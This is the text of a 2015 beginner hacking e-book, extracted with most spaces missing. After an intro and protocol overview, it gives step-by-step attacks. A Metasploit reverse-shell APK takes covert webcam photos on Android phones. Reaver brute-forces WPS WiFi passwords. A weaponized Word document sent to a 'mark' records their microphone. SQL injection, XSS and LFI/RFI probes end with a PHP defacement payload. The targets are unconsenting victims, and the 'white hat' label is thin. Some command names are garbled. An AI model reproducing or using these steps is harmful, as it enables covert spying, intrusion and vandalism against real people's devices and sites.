hacking secrets to becoming a genius hacker how to hack smartphones- computers - websites for...
DESCRIPTION
Genius Hacker How to Hack Smartphones- Computers - Websites for BeginnersTRANSCRIPT
SECRETSTOBECOMINGAGENIUSHACKER
HOWTOHACKSMARTPHONES,COMPUTERS&WEBSITESFOR
BEGINNERS
STEVENEDUNLOP
Copyright©2015KBPublishingLimited.
Allrightsreserved.Nopartofthisbookmaybereproducedinanyformwithoutpermissioninwritingfromtheauthor.Reviewersmayquotebriefpassagesinreviews.
Disclaimer
Nopartofthispublicationmaybereproducedortransmittedinanyformbyanymeans,mechanical or electronic, including photocopying or recording, or by any informationstorageandretrievalsystem,ortransmittedbyemailwithoutpermissioninwritingfromthepublisher.
Whileallattemptshavebeenmadetoverifytheinformationprovidedinthispublication,neither the authornor thepublisher assumes any responsibility for errors, omissions, orcontraryinterpretationsofthesubjectmatterherein.
Thisbookisforentertainmentpurposesonly.Theviewsexpressedarethoseoftheauthoralone, and should not be taken as expert instruction or commands. The reader isresponsibleforhisorherownactions.
Adherence to all applicable laws and regulations, including international, federal, state,and local governingprofessional licensing, business practices, advertising, and all otheraspects of doing business in the US, Canada, or any other jurisdiction is the soleresponsibilityofthepurchaserorreader.
Neithertheauthornorthepublisherassumesanyresponsibilityorliabilitywhatsoeveronthebehalfofthepurchaserorreaderofthesematerials.
Anyperceivedslightofanyindividualororganizationispurelyunintentional.
BestSellingBooksBySteven
CONTENTS
INTRODUCTION:
APICTUREOFHAKING
FactversusFictionversusDieHard
WhataHackerReallyIs
WhyYouShouldGiveHackingAShot
CHAPTER1:
WHITEHATS–ALOOKATTHEGOODGUYSINHACKING
CHAPTER2:
THEBIGTHREEPROTOCOLS
ICMP
TCP
UDP
CHAPTER3:
GETTINGSTARTED–HACKINGANDROIDSMARTPHONES
Whatyouwillneed
StepbyStepGuide
CHAPTER4:
HACKINGWiFiPASSWORDS
Whatyouwillneed
StepbyStepGuide
CHAPTER5:
HACKINGACOMPUTER
Whatyouwillneed
StepbyStepGuide
CHAPTER6:
HACKINGAWEBSITE
SQLInjection
StepbyStepGuide
XSS(Cross-SiteScripting)
RFI/LFI(Remote/LocalFileInclude)
CHAPTER7:
SECURITYTRENDSOFTHEFUTURE
CHAPTER8:
NOWLET’SLOOKAT-HACKINGDO’S
CONCLUSION:
INTRODUCTION:
APICTUREOFHAKING
FactversusFictionversusDieHard
Backin2007,famedNYPDDetectiveJohnMcClanewasfacingthetoughestbattleofhislife - at least up until that point. Used to physical confrontations and playing cat-and-mouse with flying bullets and shattering windows, he was taken aback when he wassuddenlyfacedwithoneofthemostamazingactsofterrorisminrecentmoviememory.Hewasfightingageniuscapableofcontrollinganythingfromtrafficlightsandcellphonestothestockmarket,militaryaircraft,andtheNSA.
Ofcourse,theDieHardfranchiseisnotonetodealwithmagicandtheoccult-sotheseremarkablefeatsareexplainedastheworkofagroupofelitecomputerhackers,perhapsthebestintheworldthateventheUSGovernmentcouldnotmatch.Andasviewers,wetendtoenjoythosesceneswhenaseeminglyomnipotentopponentfallstotheclutchesofatenaciousprotagonist.
However, this can also mean that we are willing to suspend out judgment of what ispossibleandwhatisnot.AndinLiveFreeorDieHard,thestellarhackingperformanceisnothing short of mere fantasy. In real life, hackers have a much less glamorous (andinfinitelymoredifficult)timetinkeringwithtechnologicalroadblocks.
But ifHollywoodhas ledyou tobelieve thathacking isalladrenaline-rush, then there’sstillsomethingforyou.HistoryshowsthattheGovernmenthadindeedbeenhackedonce-andabout$1.7-milliondollars’worthofsoftwarevitaltotheintegrityoftheInternationalSpaceStation’sphysicalenvironmenthasbeencompromised.Moonraker,anyone?
The juvenile’s name is Jonathan James - and yes, he was only 16 years old when heaccomplishedthismomentousfeat.Earlier,hehadalsotargetedoneoftheDefenseThreatReduction Agency servers, directly monitored by the Department of Defense. Theseservers work to mitigate threats to America and its ally nations in cases of nuclear,biological,chemical,andevenconventionalwarfare.Thebackdoorhesetupallowedhimtoaccesssensitiveemails,stealingemployeeusernamesandpasswordsintheprocess.
James’sISSexploitscausedNASAtoshutdownitscomputersystems.Hesetarecordforbeing the first juvenile sent to jail for hacking. In his defense, he said that he onlydownloadedthecodetohelpinhisstudiesofCprogramming-evendismissingthecodeas“crappy”and“certainlynotworth$1.7million”.
In response, the Government gave him a 6-month house arrest as well as a ban onrecreational computer use. He violated parole, for which he spent six months in jail.Becausenomatterhowgreatahackeryouare,youcannothackintothelegalsystem.
Anotherthingthatthemoviesloveportrayingisthathackersaremostlyeitherdisgruntledmembersofsocietyholedup in theirbasementsorMIT-levelgeniuses in theemployoftheGovernment(orsomemalevolentvillain).Whateverthepersonification,thesepeopleareshownequippedwithstate-of-the-arthardwareandsoftware thatseems tobealmostalwaysthemedinblack,white,green,andblue.Justtoshowthatfactcanbestrangerthanfiction,enterAdrianLamo,the“homelesshacker”whousescoffeeshopsandlibrariestodo “unofficial” (and criminal) penetration testing forMicrosoft, TheNewYork Times,Yahoo!,BankofAmerica,Cingular, andCitigroup.Aside fromagenius IQ inhacking,prettymuchall-elsehehasisalaptopandachangeofclothes.
Oh,andhewasalsofined$65,000,andsentencedtohalfayearofhomeconfinement.Histwo-yearprobationendedlast2007.
WhataHackerReallyIs
As shown here, a hacker is prettymuch capable of causing far-reaching damage quitesimilar to thewayHollywood says.Dependingon the conditions, a capablehacker cantakeoveruseraccounts,compromisesystems,andevengetawaywithstolenintellectualproperty.
Themaindifferencebetweenthemoviesandreallifeisthathackingisneverreallyeasy.And no, real hacking skills take more than learning how to Google. Granted, stealingsomeone’s password can be done any day even by “script kiddies” (thosewho rely onFAQsandpre-builttools).
In reality,hacking involvesknowingexactlyhowa systemworks.Thismeansahackerprobablyhasbuiltthatsystematonepoint,hastinkeredwithit,hastesteditsresponsestodifferentinputs,andhasalreadypinpointedandanalyzeditsweaknesses.
Ahackerdoesnotsimplytypeonakeyboardwithblazing-fastfingersandwaitforabarto load to 100% (while something exciting happens in the background). Usually, theagentsused to feelaround the targetnetwork - trojans,worms,etc. - can takeweeksormonths (or even a full year!) to spread completely. However, when they do, they areindeedcapableofpullingoffbigscreen-leveldestruction-likethedestructionofuraniumcentrifuges in an Iraniannuclear facility back in 2009 and the toastingof aTurkishoilpipelineayearearlier(bothwiththehelpofaStuxnetworm).
WhyYouShouldGiveHackingAShot
Inreallife,hackersalwaysgetcaught.Asidefromnationallawsindifferentpartsoftheworld, there are differentmultinational agencies that can track anyone, anywhere. Thismeansifyoumesswithatargetbigenough,youmightfindyourselfontherun.
So, is there really anything for hacking aside from the trill? Indeed, there is - today,hackers can earn anywhere from $50,000 to $100,000 a year, depending on yourexperienceandeducation.Thisisintheformof“ethical”or“white-hat”hacking.
Inthisworldwheresecuritybecomesmoreandmoreofapressingconcern,themarketforwhitehatshas increasedyearonyear. In fact, figuresprojecta totalof40%increase insecurity-relatedspendingamongglobalcorporationsbetween2011and2015.Thismeansifyouhaveapassionforpokingintonetworksandrevealingexploits,youcanputthoseskillstousewithoutgoingoutonalimborgettingthrowninjail.
Thisbookwillshowyouhow.
CHAPTER1:
WHITEHATS–ALOOKATTHEGOODGUYSINHACKING
Onequestionthatcomestomindis:whatmakeshacking“ethical”?Afterall,byitsverydefinition,ahack is something thatexploitsand takesadvantageofvulnerabilities foraspecificgain.Therearecaseswhenhackingisjustifiedthough,suchasthefollowing:
1. Expressconsent(almostalwaysthroughacontract)isgivenbythecompanythatallows you to probe their network. Thiswill allow you to identify the potentialrisksintheirsecurity.
2. Youwillnotharmthecompany’sassetsintheprocess(exceptionsmayapply).
3. When the work is completed, it should be closed out so no one can exploit itafterwards.
4. Anyvulnerabilityyoufindshouldbereportedtothecompany.
Doing thesewill separate thewhitehats frommaliciousor“black-hat”hackers.Despitetheshadycharacteristicsof the job,whitehatshavehelpedcorporationsmakeleapsandboundsinprotectingtheinformationweentrusttotheminourdailytransactions.
Beingawhitehathackerisessentiallylikesomeoneaskingyoutoplaythebadguy.Thesecompanieshavebuiltupawallaroundtheirvitalsystems,andtheywanttoseejusthowstrong that wall is against a real-life threat (you). This way, you have to have all theabilitiesofarealhackerwithoutallthebadintent.
Butwait…There’smore!
But it doesn’t endwith good intentions - you need to have proof of that, or howwillanyonetrustyou?
Togetthatproof,youneedtobeaCertifiedEthicalHackerorCEH.Thisisaqualificationthat can be obtained in the assessment of security systems through penetration testingprocesses.Onewilltakeanexam(formallylabeled“312-50”),whichgetsupdatedeverynowandthen.
To take the exam, one will first have to go through training at an ATC or AccreditedTrainingCenter.Ifyoudon’twanttoandopttoself-study,youmusthaveproofofatleast2-years’worthofrelevantsecurityworkexperience(oreducationalbackgroundequatingtothis).Then,thereare150questionsanswerablein4hours,coupledwithatestingandreservationfee.Passit,andvoila!Youareofficiallyanethicalhacker!
Whosayshackerscan’tgetcredentials?
CHAPTER2:
THEBIGTHREEPROTOCOLS
Beforewegodownanddiscussthestep-by-stepdetailsguideinhackingstuff,letusfirsttacklethreeofthemostusedprotocolsyouwillencounterasawhitehat.Theseprotocolsmakeuparound99%ofallInternettrafficandnetworkinfrastructures-justashowyouhavetoknowindividualchemicalstobeachemist,youneedtoknowtheseprotocolstobeahacker.
ICMP
ThisstandsforInternetControlMessageProtocol,themostusedinnetworking.Thisisaconnectionlessprotocol,meaningitwillnotuseanyportnumber.Itisusuallymeantfordiagnosticpurposes,serverquerying,orerrorreporting.
Asahacker,knowledgeaboutthisisimportantbecauseyouwillbeusingICMPalottosendpayloads.Pinging,forexample,usesICMP-andthis,justlikeanyICMPmessage,hasinherentsecurityholes.
InICMP,forexample,anerrormessageisnotsentinresponsetoanerror.Whentheerrorissent,itwillsendtheIPheaderanddatagram,whichdetailstheerror’scause.Thiswillcausethereceivertoassociatetheerrorwiththespecificprocess.ThismeansthatwhentheType0(echoreply)hasbeensent,thereplywillnotbeaType8(echorequest),thoughaType8willalwayselicitaType0.
This is taken advantage of by the “SmurfAttack”,which is nowhere near as cute as itsounds. In this technique, the attacker will spoof the ICMP packet’s source address,sendingabroadcasttoallcomputersinthenetwork.Ifthistrafficisnotfiltered,thenthevictim’s networkwill be congested, dropping its productivity.Aside from using this toSmurfthenetwork,itcanalsobeusedtogatherinformationbydiscoveringallhostsonthenetwork.
TCP
This stands for TransferControl Protocol, a fixed communication protocol that is a bitmore complicated andmore reliable than UDP. It works with IP (Internet Protocol) indoingitsjob-TCPtakescareoftheinternalcommunicationbetweentheapplicationandnetworksoftware,whileIPtakescareofcommunicationfromanothercomputer.
SinceTCPandUDPareverymuchalikeevenintermsofhackingpotential,checkoutthenextitemforagreathackidea.
UDP
This stands for User Datagram Protocol, a connectionless and usually unreliable (nopacketsequencing,noresendingofmissingorbadpackets)protocol that reliesonIP inpretty much the way that its more famous sibling TCP does. It has a fairly simplealgorithm-simplysendaUDPpacketandwaitforaresponse.If theresponseisICMP,theportisclosed.IfUDP,itisopen.
HacksusingtheUDParealmostalwaysinextricablylinkedwiththeothertwoprotocolsdiscussedhere.OneofthemostcommonUDP-basedattacksistheUDPflood,which,liketheSmurfAttackcancauseDenialofServicetothevictim.Whilenotasstraightforwardas aTCPDoS attack, theUDP flood is fairly simple to execute. Simply scan the opennetworksusingNmap,andsendahugenumberofUDPpacketstowardstherandomopenports.Thiswillcausethedistanthosttocheckforapplicationslisteningattheport,trytoshut out those apps, and reply with an ICMP unreachable packet. This will ultimatelycausetheservicetobeunreachablebyanyotherclients.
CHAPTER3:
GETTINGSTARTED–HACKINGANDROIDSMARTPHONES
So, let’sgetdowntothenitty-grittyandstart learningthebasicskillsyouneedtohack.Andwewillbeginwithsomethingthatalmosteveryonehasthesedays-smartphones.
Whatyouwillneed
All youwill need is a simple computer connected to the Internet, equippedwith a freepenetration-testingsystemcalledMetasploit.ThiscanrunineitherWindowsorLinux,butforthistutorialwewilluseaLinuxvariantgearedespeciallyforpenetration-KaliLinux.
Then,ofcourse,youwillneedatargetAndroidsmartphone.Beforestarting,youwillneedto know the IP Address of the attacking device (i.e., your computer), as well as itsconnectionreceivingport.
Asaprerequisite,youneedtobeabletocreateatamperedAPKthathastheattacker’sIPandreceivingportinthesourcecode’sconst-strings.Ifyoucan,thisisbestdonewithanappthatactivatesonthephone’sstartup,soyoucanhaveapersistentbackdoor.
StepbyStepGuide
STEP1:PullupyourLinuxterminalandusetheMetasploitpayloadframework:
Msfpayload android/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=<PORTTORECEIVECONNECTION>
Executethecommand.
STEP2:Thepayloadweusedhereisreverse_tcp-withthis,theattackerwillexpectthevictim to connect to the attacking machine. The attacker will then need to set up thehandler to work with incoming connections to the specified port. Type themsfconsolecommandandgotothesoftware’sconsole.
Onthelinethatsays“msfexploit(handler)>”,type“setlhost<ATTACKER_IP>”,andthen“setlport<PORTTORECEIVECONNECTION>”.Then,type“exploit”tobeginlisteningtoincomingcommunication.
TheMetasploitframeworkwillnotifyyouoncethereversehandlerhasstarted,andoncetheMeterpreter session has opened. Thiswouldmean that you can now do everythingwith the victim’s phone! Try typing “webcam_list” and then “webcam_snap 1” or“webcam_snap2”forstarters.Thissnapsapicfromthephone’sfrontorbackcamera-alldoneremotelyandinsecrecy,andsenttoyou!
Ofcourse,allthiswouldbedoneassumingthatthevictimsdownloadthetamperedapp.As a hacker-in-training, you should knowbetter than installing apps fromunauthorizedsourcesunlessyoucan read theAPK’s sourcecodes.Thehackwehad featuredhere ispretty easycompared towhathighly accomplishedhacker-programmers cando - thingslike creating a 3Dmapof your homeor office through randomly taken snapshots.Yes,muchlikeDarkKnightorIronMan3.LookuptheUSmilitary’sPlaceRaiderapptoseewhatwemean.
CHAPTER4:
HACKINGWiFiPASSWORDS
Wewouldbecompletely remiss ifwediscusshackingandnoteven thinkaboutgettingpastthatstubbornWiFipasswordyourneighborkeeps(wecouldalsobejoking).ButincaseyouwouldeverneedtogetpastaWPA2passwordinyourwhitehatactivities,thenwe’lltellyouthebasics.
There isa flaw in theWPS(WiFiProtectedSetup)systemthatallowsWPAandWPA2passwords tobebroken indifferent situations. Ironic, right?The thing is,WPSsetup isenabledbydefaultinmanyaccesspointsevenaftertheaccesspointisreset.
Whatyouwillneed
Forthisactivity,youwouldneedawirelesscardthatsupportspromiscuousmode.Thisiseasytocomebyononlinestores.Youwouldalsoneedatarget,anaccesspointwithbothWPSandWPA2securityenabled.Forthetutorial,wewillbeusingthesameKaliLinuxsystemmentionedinthepreviouschapter.
StepbyStepGuide
STEP1:OpentheTerminalandexecute“airmon-ng”.Thisisabashscriptthatletsyouturnyourwirelesscardintomonitormode.Thescreenwilllistthewirelesscard/sattachedtothesystem.
STEP2:Stopthewirelessmonitormodebyexecuting“airmon-ngstopwlan0”
STEP3:Tostartcapturingthewirelesstraffic(includingthatpeskyprotectedWiFi),run“airodump-ngwlan0”.Thescreenwillthenshowthecaptureddata.
STEP4:Fromthe listofcaptured traffic, find theaccesspointwith theWPA2securityandtakenoteoftheAPchannelnumber.Run“was-iwlan0-c<CHANNELNUMBER>-C-s”toknowwhethertheWPSlockedstatusisenabledornot.Ifthelockedstatussays“no”,thenwecanmovetothelaststep.
STEP 5: Here, we will brute-force the password through Reaver. This is a programavailablethroughKaliLinux,butyoucandownloaditseparatelyifyouhaveadifferentsystem.
Type“reaver-i<YOURINTERFACE>-b<VICTIM’SBSSID(MACADDRESS)> -fail-wait=360”. This can take some time. Cracking a 19-character password usingKaliLinuxrunningwithinaVirtualBoxcantakeuptofivehours.Ofcourse,afasterhardwareand betterwireless card can shorten thewait time. If you needmore help on this visithackingbasics.com.
Again,asahacker,youneedtoknowhowtostopthisfromhappeningtoyou.NotethatWPAandWPA2passwordsthatdonothavetheWPSsystemturnedonarenotaffectedbythis.
By know you should realize the importance ofmaintaining high quality passwords forEVERYTHINGyouuseonyoucomputer,phoneoranything.OneofthebestandFREEpasswordsecuritysoftwareservicesoutthereiscallLastPass.Ihighlyrecommendusingthemrightnow!Especially,ifyoucurrentlyuseonlyoneortwosimplepasswordsforallyour logins. They also have a nifty mobile app, which links everything together (for$12/yr–verycheapforwhatitisofferingyou,allconsidered).
CHAPTER5:
HACKINGACOMPUTER
This chapter is essentially,more about spying that hardcore computer hacking - takingover a computer’s processes completely (like you would with remote desktops) is anentirelydifferentanimal.Butwhodoesn’twant tofeel likeJamesBondeveryonceinawhile?Insteadofgoingtothemark’shouseandplantinglisteningdeviceshereandthere,whynotjustusesomethingeveryonehasasalisteningoutpost-histrustycomputer?
Whatyouwillneed
WewilluseprettymuchthesametoolswehadwhenwehackedtheAndroidsmartphoneearlier-ifyouhaven’tdownloadedacopyofKaliLinuxuptothispoint,youbettergetone!
StepbyStepGuide
STEP1:LikethetamperedAPKintheAndroidexploitwedid,youwillhavetofindawaytocompromisethetargetsystem.Thecommonwayofdoingthisissendinganemailwithadocumentoralink.Withinitisalistener(rootkit)thatwillallowthehackertogainaccesstothecomputer.
STEP2:Whenthedocumentisdownloadedandtherootkit,well,rooted,youwillneedtofindaloopholeorvulnerabilitythatcanbeexploited.Ifyouareluckyandthemarkdoesnot update hisWindows system, then a few things will work such as “MS14-07” thatallowstheexecutionofremotecodesfromWordandOfficeWebApps.
Search Metasploit for this vulnerability, and you will find“exploit/windows/fileformat/ms14_017_rtf”. Use it by typing “useexploit/windows/fileformat/ms14_017_rtf”.Afterloading,findoutmoreabouttheexploitbytyping“info”.Then,“showoptions”.
STEP3:ThisexploitwillworkonlyinOffice2010.Itcanbeeasytouse,though,asallyouneedtofillinisthefilename.Setitby“setFILENAME<INSERTFILENAME>”.
STEP 4: Set the payload that is needed to work in the file. Type “set PAYLOADwindows/meterpreter/reverse_tcp”.Likeearlier,settheLHOST(yoursystem’sIP)sothepayloadwill know to call your device back. Then, type “exploit”. This will create thetamperedWordfile.
STEP 5: Open up a Multi-Handler for the connection back. Simply type “useexploit/multi/handler”and“setPAYLOADwindows/meterpreter/reverse_tcp”.Finally,settheLHOSTtobeyourIP.
STEP6:Sendtheinfectedfile tothemark.Ifyoudon’thaveacluehowtodothis, tryGoogling“email”.
STEP7:Assoonasthefileisopened,ameterpretersessionwillbeactive.Nowcomesthejuicypart-onthemeterpreterprompt,tryrunning“runsound_recorder-l/root”.Thiswillturnonthemark’smicrophoneandsendallrecordedconversationsinafileandsendit toyour /rootdirectory.Easypeasy!And sinceyouareusingmeterpreter, youcandoprettymuchanythingexceptstartafirewiththekeyboard.Lotsofmeterpretercommandsareavailablethatwillgiveyouallsortsofdata-yes,allthewaydowntokeystrokes.
Again,nowthatyouknowhowitisdone,itshouldbeapieceofcaketonotfallvictim.AlwaysupdateyourOSinstallationtotakeadvantageofthelatestsecuritypatches,andbecareful of the things you download and open. If you are a Windows user, anti-virussoftwarewithrootkitdetectionabilitycangoalongway.
CHAPTER6:
HACKINGAWEBSITE
In essence, a website is just a floating something, a manifestation of the data storedsomeplaceelse.Soinhackingintoawebsite,youareessentiallyhackingintoaserver-someofthemostsecureentitiesincyberspace(ornot,dependingonyourluck).Soundslikefun?Rememberthatsomeofthemostnotorioushackingthatmadetheheadlinesrunalong these lines.And of course, successfully hacking awebsite entails a good deal oftechnicalproficiency,especiallyPHPandHTML.
SQLInjection
This is simply the act of injecting your own, home-brewed SQL commands into anexistingweb-script,allowingyoutomanipulatethedatabasehoweveryouwish.TherearedifferentwaystouseSQLinjection:
Bypassinglog-inverification
AddinganewAdminaccount
Liftingpasswords
Liftingcreditcardinformation
Accessinganyandeverypartofthedatabase
Ofcourse,thesewillonlyworkiftheSQLusedinthewebsiteisvulnerable.Anexampleisaloginscriptthatsimplytakestheusernameandpasswordinput(withoutfilteringit)and compares it with the user’s value from its database in order to check the input’svalidity. This might seem like a really simple-minded way of authenticating log incredentials,butrealprogrammersuseitinreal-worldscenarios.Don’taskuswhy.
StepbyStepGuide
STEP1:Toknowifacertainscriptisinjectable,simplyencloseyourinputswithdoublequotation.Ifanerroroccurs,itismostlikelyinjectable.Ifthedisplaygoesblank,thenitmightbeinjectablebutyouwillhavetogothroughblindSQLinjection(whichisneverawalkinthepark).Ifanythingelsehappens,thenitisnotinjectable.
Let’ssaythatweknowtheadminusername:Administrator.Sincetheloginsystemdoesnotfiltertheinput,wecansimplyinsertanythingintothestatement.Intheabovefaultycode,wecanput“‘OR1=1–”inthepasswordbox.ThiswillresultinthefollowingSQLquerytoberuninthedatabase:
“SELECT ‘IP’ FROM ‘users’WHERE ‘username’=’Administrator’ AND ‘password=’’OR1=1-’”
Weknow that theORqueryonlyneedsonequestion inorder to succeedwithaTRUEvalue. Since 1=1, the answer is always true and the ending dash cancels out the finaldoublequotation,weendupwiththecorrectsyntaxforthequery.
XSS(Cross-SiteScripting)
IfyouhavebeenhangingaroundtheInternetasmuchasyoushouldhave(tobeahacker,atleast),youwouldhaveatleastheardofthisterm.Thisallowstheattacker’sinputtobesent to unwary victims. The primary use is cookie stealing - and no, not the type yoursadisticolder siblingdoes.Once theattacker stealsyours, theycan log into the site thecookieisstolenfromusingyouridentityandundertherightconditions.
Thisvulnerability canbedeterminedusing the site’s search facility.Try feeding itwithsomeHTML,suchas“<fontcolor=green>XSS</font>”.IfthewordXSScomesup,thenthesiteisvulnerable.Else,youneedtofindadifferentwayin.
RFI/LFI(Remote/LocalFileInclude)
Thisisatypeofvulnerabilitythatallowsausertoincluderemoteorlocalfiles,havingitparsedandthenexecutedontheserver.
To see if a certain website is vulnerable to this issue, try visiting “index.php?p=http://www.<DOMAINNAME>.com/”.If thesiteshowsup, then itcanbeexploitedwithRFIorLFI.Ifadifferentthingappears,thenthesiteisnotvulnerabletoRFI-thisdoes not necessarilymean it is safe from LFI, however. To verify, go for “index.php?p=/etc/passwd”.Thisisassumingtheserverisrunningona*nix-basedsystem.Ifyoucanviewthepasswordfile,thentheservercanbehackedbyLFI.Ifsomethingelseappears,thenRFIandLFIbothwon’twork.
IfthetargetisfoundtobevulnerabletoRFI,youcanuploadaPHPcodetotheirserverPHP.Let’ssayyoucreatethefollowingunderthefilehack.php:
<?php
Unlink(“ïndex.php”);
System(“echoGOTCHA>index.php””);
?>
Onceyouview“index.php?=http://<DOMAINNAME>.com/hack.php””, then the codewillberunontheserver.Whenthisisdone,thesitewillchangetothesimpleGOTCHAmessageandnonewillbethewiser.
CHAPTER7
SECURITYTRENDSOFTHEFUTURE
Wearen’tplayingNostradamushere,butthisiswhereeverythingwillleadinthenot-so-distantfuture-thefivesecuritytrendsthatwillbesuretokeepyouonyourhackingtoes.
1.Evolution towards incident response. Instead of merely incident prevention, ITsecurityfirmstendtoshifttheirfocustorespondingwhenanincidenthasoccurred.Asahacker,thismeansthatyouwillnotonlyencounterawallandaweboflaserswhentryingtogettothatsecretvault-youwillalsohaveahostofarmedpersonnelrunningafteryouwhenyousucceed.
2.Managed security services. Formost businesses, IT security is a 24/7 priority. Thismeans theyneedpersonnel, and security professionals are only recently rising from theranks.Tomakeupfortheneedforprotection,ITservicescanbeoutsourcedtodedicatedsecurityservices-meaningyouwillbegoingupagainstorganizedsystemsandnot justtheworkofasingle(possibledisgruntled)programmer.
3.Securitygetscloudy.Cloud-basedsystemsmeannegligibleimplementationeffort,andsecuritystufflikeproxies,secureemails,andthelikearealsobeingmovedtothecloud.Needlesstosay, thismeansanentirelynewskillsetneedstobelearnedtonavigatethishazyground.
4.From tech to platforms. In the coming days, security is merging to be a completeplatform-notjustdisparatepointproductsandsystems.Thisallowsthebusinesstoberunwithin a secure environment throughmultiple applications.Again, amoredifficult timeforhackers.Buthey,you’rehiredtodothetoughjobnooneelsecan.
5.Endpointsecurityregainsground.Thoughmanystill lookatendpoint securityasathingofthepast,network-basedsecuritycontrolsarenolongeraseffectiveastheyshouldbe inwarding off attackers. Thiswouldmean that breaking into the networkwould nolongerbe synonymous tobreaking into the individual devices - there’s another layer ofsecuritytogetpastthrough.
CHAPTER8:
NOWLET’SLOOKAT-HACKINGDO’S
Duringthefirstchaptersofthebook,wehaveprettymuchdetailedwhatyoushouldn’tbedoing as awhite hat hacker. In this last chapter,wewill detail a fewmore things youshoulddotobesuccessful.
1.Setyourgoals.Knowexactlywhatyouaresettingouttofind-itmakeslittlesensetostarthackingblindly.Youshouldknowwhetheryouwanttoseewhatanintruderseesonthe target points of access,what he can dowith that information,what the victim seeswhenahackoccurs,etc.
2.Plan thework.Another caution against being haphazard.Make sure that the testingprocess and interval is specified, and the networks you need to test clearly identified.Hackingcaneasily leadyouastray, sidetrackedwithacurious loopholeorproblemyouwouldwanttosolve-butultimatelydoesnotleadtotheobjective.
3.Keeparecord.Youwouldwanttoknowhowyougotthere,especiallyifyouhavetobrute-forceyourwaythroughaverytoughshellofsecurity.Attheveryleast,thiscanhelpyou in future jobs. Record everything that happens, whether or not your hack wassuccessful.Andremembertokeepaduplicateofyourjobs.
4.Do no harm. Remember when Dennis Nedry hacked the power supply in JurassicPark?Itwasn’taprettysightforhimorfortherestoftheparkpersonnel.Remembertoalways think twice about every exploit, considering if what you do can cause anywidespreaddamage.
5.UseaScientificprocess.Thismeansyousetgoalsthatarequantifiable,teststhatarerepeatableandconsistent,aswellasteststhatarenovel-thosethatcanimpactinthelongrun.
6.Stick with your tools. As a new hacker, you will see several dozen different toolsavailablefordifferentjobs.Thetemptationtodownloadeachoneisgreat.However,thesetoolsaresometimesuseddifferentlyandcanspoilyourhackingmethodology.Onceyoufindonethatsuitsyourstyle,itisbesttosticktoit.
7.Drawupreports.Your logsarenot reports - theyare for reference. Instead,createamoreconciseandlegiblereportoratleastaprogressupdate,thatwillsummarizealltheimportantpointsofyourstint,aswellasarecommendationofhowtoimprovethetargetsystem.
CONCLUSION:
Hacking can be a personal challenge and a perfect avenue to improve your skill andstanding.However,itisalsoajobthatreliesonagreatdealofskill,waybeyondworkingwithpresettools.Italsorequiresagreatdealofcautionandtemperance.
Likemost things tech-related,new technologieswill comeup thatwill surelykeepyouracingfor thebreakthrough.Andsincesecurityiswherethemoneyisatrightnow(andhopefullyforeverafter),therateofdevelopmentinthefieldofhackingcanbelightning-paced. Always keep an eye out for headlines and articles that contain valuableinformation.Andofcourse,don’tforgettoexperiment.
Finally,don’tforgettohavefun!It’suselessgreetingamorningwithawarmcupofRedBullifyoufeelfrustratedinyourefforts.Thoughthattimemaycome,rememberthatthejobitselfisachallengeandyousignedupforit.Soforgetthatfrownandhackaway-thefeelingofabreakthroughwillbeallthemoreprecious!
BestSellingBooksBySteven
AuthorNote:P.S.Irealizethatmywordswillnotresonatewitheveryreader.Asapersoncommitted to constant and never-ending improvement, if you have any constructivefeedbackthatyouwouldliketooffer,orfeelthecontentinmybookcanbeimprovedinanyway……pleasefeelfreetocontactmeat:[email protected]
Money-back:Ifyouarenotsatisfiedwiththecontentinsidethesebooksforanyreasons,youcanrefundyourpurchasewithin7days.Simplyhoverover‘YourAccount’andclickon‘ManageYourContentandDevices’.Thenselect the‘Action’buttondirectlynext tothebookyou’dlikearefundforandclickon‘ReturnforRefund’.
FinalNote:Claimingarefundisabsolutelyfinewithmeifthatiswhatyouwouldliketodo.Iwouldreallyappreciateitifyou’dbekindenoughtocontactmeviaemailregardingyouropinionandwaysyouthinkthebookcouldbeimproved.Thiswouldbeveryhelpfulandallowmetoprovidegreatervaluetopeople.
If youdid enjoy the book thenplease help others benefit from this bookbywriting anhonest reviewonAmazon tohelp the rankingof thebook increase somorepeople canfindthisbook.
Manythanks!